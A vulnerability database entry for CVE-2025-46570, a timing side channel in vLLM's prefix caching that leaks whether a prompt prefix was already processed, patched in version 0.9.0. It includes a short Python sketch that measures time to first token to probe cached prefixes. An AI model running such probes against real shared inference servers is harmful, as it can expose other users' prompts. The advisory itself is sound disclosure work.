Executive Summary



This vulnerability is currently undergoing analysis and not all information is available. Please check back soon to view the completed vulnerability summary.
Information
Name                       CVE-2025-46570
Vendor                     CVE
First vendor publication   2025-05-29
Last vendor modification   2025-05-29

Security-Database Scoring CVSS v3

CVSS vector:             N/A
Overall CVSS score       N/A
Base score               N/A
Environmental score      N/A
Impact subscore          N/A
Temporal score           N/A
Exploitability subscore  N/A

Security-Database Scoring CVSS v2

CVSS vector:        N/A
CVSS base score     N/A
CVSS impact score   N/A
CVSS exploit score  N/A
Attack range        N/A
Attack complexity   N/A
Authentication      N/A

Detail

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed and the PagedAttention prefix-caching mechanism finds a matching prefix chunk, the cached KV blocks are reused and prefill computation for that chunk is skipped, so generation starts sooner; this is reflected in a lower TTFT (Time to First Token). The timing difference between cache hits and misses is large enough to be measured, allowing an attacker to infer whether a given prompt prefix has already been processed by another request. This issue has been patched in version 0.9.0.
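
To make the side channel concrete, the following is a minimal client-side sketch of how such a timing oracle could be measured. It is illustrative only: the endpoint URL, model name, and probe prompts are assumptions for the example, not details from the advisory; the code simply times how long a streaming completion request takes to yield its first token.

import time
import requests

# Hypothetical values: a local vLLM OpenAI-compatible server and a
# placeholder model name; neither comes from the advisory itself.
ENDPOINT = "http://localhost:8000/v1/completions"
MODEL = "my-model"

def time_to_first_token(prompt):
    """Send a streaming completion request and return the seconds elapsed
    until the first streamed chunk arrives (a client-side proxy for TTFT)."""
    payload = {
        "model": MODEL,
        "prompt": prompt,
        "max_tokens": 1,
        "stream": True,
    }
    start = time.monotonic()
    with requests.post(ENDPOINT, json=payload, stream=True, timeout=60) as resp:
        resp.raise_for_status()
        for line in resp.iter_lines():
            if line:  # skip SSE keep-alive blank lines
                return time.monotonic() - start
    return float("inf")

# On a vulnerable version, a prompt sharing a long prefix with a previously
# processed request should show a measurably lower TTFT than a cold prompt.
cold = time_to_first_token("An unrelated, never-before-seen prompt.")
probe = time_to_first_token("A candidate prefix the attacker wants to test.")
print(f"cold TTFT:  {cold:.4f}s")
print(f"probe TTFT: {probe:.4f}s")

On a vulnerable deployment, repeating this measurement over candidate prefixes and comparing each TTFT against a cold baseline would reveal which prefixes are already resident in the prefix cache.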

Original Source

URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-46570

CWE : Common Weakness Enumeration

%      Id       Name
100 %  CWE-208  Observable Timing Discrepancy

Sources (Detail)

https://github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e...
https://github.com/vllm-project/vllm/pull/17045
https://github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r

Alert History

Date                 Information
2025-05-29 21:20:34  First insertion